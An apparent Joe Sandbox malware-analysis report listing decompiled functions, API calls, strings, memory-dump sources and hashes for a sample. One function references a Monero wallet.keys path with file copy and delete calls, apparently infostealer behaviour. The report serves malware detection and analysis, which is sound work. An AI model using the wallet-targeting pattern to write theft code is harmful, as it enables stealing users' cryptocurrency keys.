ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C69E8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C69E777
MOZ_PROFILER_STARTUP, xrefs: 6C69E5A1, 6C69E5CC, 6C69E5FF, 6C69E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C69E722, 6C69E750, 6C69E7A2
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C69E826, 6C69E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C69E655

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction ID: 8c3d27a3f7cef48c4ed5c2157a3c3fed9863bba23175123dc71420e2c82529b7
Opcode Fuzzy Hash: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction Fuzzy Hash: 4111AD31A04258DFCB009F16C888B6ABBB4FFC9329F050A19E84587651D774B805CFDE

Function 00938D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0093951E,00000000), ref: 00938D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00938D62
wsprintfW.USER32 ref: 00938D78

Strings

%hs, xrefs: 00938D6F

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 8da0c0615ee3ccbbf9f4716a68baf97097880e4e24dbe80d5d79aa9a1ce3ef29
Instruction ID: 45a93354c558ba52848d375c1b49b972f7ea5ae176ee99d9cb11b88e6b254ba7
Opcode Fuzzy Hash: 8da0c0615ee3ccbbf9f4716a68baf97097880e4e24dbe80d5d79aa9a1ce3ef29
Instruction Fuzzy Hash: 0AE0E675A50208BFDB10DB94DD09E6977B8EB84702F004154FD0A972C0DDB56E109F56

Function 6C6A0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0CD5

Part of subcall function 6C68F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C68F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0D40
free.MOZGLUE ref: 6C6A0DCB

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

free.MOZGLUE ref: 6C6A0DDD
free.MOZGLUE ref: 6C6A0DF2

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction ID: 0744bd5b5f7c2c126cec454ca987b28fa44c9ec751ffde8c5b25c6819782081d
Opcode Fuzzy Hash: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction Fuzzy Hash: 154139719087809BD320DF29C08079AFBE5BFC9714F118A2EE9D987750D770A846CB9B

Function 6C6ACCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDA4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD158
Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDC4

Part of subcall function 6C6A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6B15FC,?,?,?,?,6C6B15FC,?), ref: 6C6A74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACECC

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

Part of subcall function 6C69CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6ACEEA,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000), ref: 6C69CB57
Part of subcall function 6C69CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C69CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6ACEEA,?,?), ref: 6C69CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD058

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction ID: 7f1d13926e85e4132c53c4f335a1232c33e1e35778ffcb01c90bc5c865becd05
Opcode Fuzzy Hash: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction Fuzzy Hash: 2FD16F71A04B469FD708CF28C480B99F7E1BF89308F01866DD95987712EB31B9A6CBC5

Function 0092D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,006FA970,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 00938B86

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0092D481
lstrlen.KERNEL32(00000000), ref: 0092D698
lstrlen.KERNEL32(00000000), ref: 0092D6AC
DeleteFileA.KERNEL32(00000000), ref: 0092D72B

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: e54cce14a4d7c2c80bf57533930e2ee382f4595ff17b33aa84ccba2c6242bd87
Instruction ID: c8c5d1aeb96c01272d5df8869f1ee0b0ed342983dcbf3a67e99e23b545aee232
Opcode Fuzzy Hash: e54cce14a4d7c2c80bf57533930e2ee382f4595ff17b33aa84ccba2c6242bd87
Instruction Fuzzy Hash: 0291FD72910108ABDB04FBA4DC96FEE7338AF94300F504168F547B60A1EF746A09CFA6

Function 6C675C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C675D40
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C675D67
__aulldiv.LIBCMT ref: 6C675DB4
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C675DED

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction ID: d33b4dba655bb99291579b5ea7e7ad6204471695016f9aad492d62ec9b1b7e3c
Opcode Fuzzy Hash: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction Fuzzy Hash: 89518F71E001698FCF08CF69C994AAEBBF1FB85304F198A5DD811A7B50C7307945CB99

Function 6C65CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C65CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C65CF4E

Strings

0, xrefs: 6C65CF30

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction ID: e54310c26906e80553e8d3bb2d46e827d1f78c5d19c18f1187dfef5d907545ba
Opcode Fuzzy Hash: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction Fuzzy Hash: 9D511475A002568FCB00CF18C890A9AFBB5EF99300F29859DD95A5F351D731ED16CBE0

Function 00933560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: d9a225ef0e9d17327982e5ec8188e30ef77733cbf1b22625157cecf160d43efb
Instruction ID: eb00ac96452c7ad37baa5d38277f73b31e64def4fdab7d3a92f2d102100db3bf
Opcode Fuzzy Hash: d9a225ef0e9d17327982e5ec8188e30ef77733cbf1b22625157cecf160d43efb
Instruction Fuzzy Hash: AC4110B5D10109AFCB04EFA4D886FEEB778AF84304F108418F51677291DB75AA09CFA2

Function 6C696470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6982BC,?,?), ref: 6C69649B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6964A9

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69653F
free.MOZGLUE(?), ref: 6C69655A

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction ID: 98cb846002616a141ddfcc5cd91472c026677bdcc18c31a34d08c92d525b97ac
Opcode Fuzzy Hash: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction Fuzzy Hash: 223161B5A04305AFD740CF15D88469AB7E4FF89314F00482EE85A97751DB34E919CBDA

Function 6C66B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C66B4F5
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B502
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B542
free.MOZGLUE(?), ref: 6C66B578

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction ID: f8c6926e3cb4d4af112b9870dfa7403b397d49b61d05b120268176a51f4f12c6
Opcode Fuzzy Hash: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction Fuzzy Hash: 85110330A04B41C7D321CF2AC8407A5B3B0FFDA319F14970AE84953E02EBB0B5C5879A

Function 6C693DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C65F20E,?), ref: 6C693DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C65F20E,00000000,?), ref: 6C693DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C693E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C693E0E

Part of subcall function 6C68CC00: GetCurrentProcess.KERNEL32(?,?,6C6531A7), ref: 6C68CC0D
Part of subcall function 6C68CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6531A7), ref: 6C68CC16

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction ID: 1eb75ff979cc5475eae7f49dcf4a0ee0aad8e9e8d9996727dab3d755bc266919
Opcode Fuzzy Hash: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction Fuzzy Hash: 9BF0F8B1A002087BDB00AB55EC81DAB376DEB87628F040021FE0957741D636BE6996FF

Function 009392E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00933AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00933AEE,?), ref: 009392FC
GetFileSizeEx.KERNEL32(000000FF,00933AEE), ref: 00939319
CloseHandle.KERNEL32(000000FF), ref: 00939327

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
